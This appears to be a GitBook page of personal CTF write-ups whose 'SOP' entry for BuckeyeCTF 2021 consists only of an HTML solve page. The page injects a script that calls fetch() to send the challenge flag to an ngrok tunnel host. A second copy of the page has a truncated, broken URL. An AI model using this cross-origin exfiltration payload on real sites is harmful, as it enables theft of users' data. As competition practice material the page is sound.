CTF - Info/Codes/Notes
  • Writeups SkyMas 2021
  • ☠️DeadFace
    • Dead Men Tell No Tales
    • The Count
    • Window Pains
    • Window Pains 2
    • Window Pains 3
    • Window Pains 4
    • You Shall not Pass
  • 🇵🇹Jornadas 2021
    • Return that ROPe
    • IPv6
  • 👁️BuckeyeCTF 2021
    • Canary
    • Tesseract
    • StegBot
    • SOP
    • Jupyter
    • Curly fries
    • Sozu
    • BASIC
    • Ret4win
    • Flattened
    • Defective RSA
  • 👑KillerQueen CTF
    • Web
      • Jail Web
    • PWN
      • Broke Collage Students
      • A Kind of Magic
      • Tweety Birb
      • Zoom2Win
    • Not mine :D
  • 🔺CTF Int. MetaRed 2021 - 3rd STAGE
    • PWN
      • Numerology
      • NoteServer
Powered by GitBook
On this page
  1. BuckeyeCTF 2021

SOP

<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8" />
        <meta name="viewport" content="width=device-width" />
        <title>SOP Solve</title>
    </head>
    <body>
        <h1>SOP Solve</h1>
        <script src="http://172.16.0.10/?message=fetch%28%22http%3A//b94a-2620-0-1a10-7800-5345-4ebe-504f-9b6a.ngrok.io/flag%22%29" charset="utf-8"></script>
    </body>
</html>
</html>
/<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8" />
        <meta name="viewport" content="width=device-width" />
        <title>SOP Solve</title>
    </head>
    <body>
        <h1>SOP Solve</h1>
        <script src="http://172.16.0.10/?message=fetch/flag%22%29" charset="utf-8"></script>
    </body>
</html>

PreviousStegBotNextJupyter

Last updated 3 years ago

👁️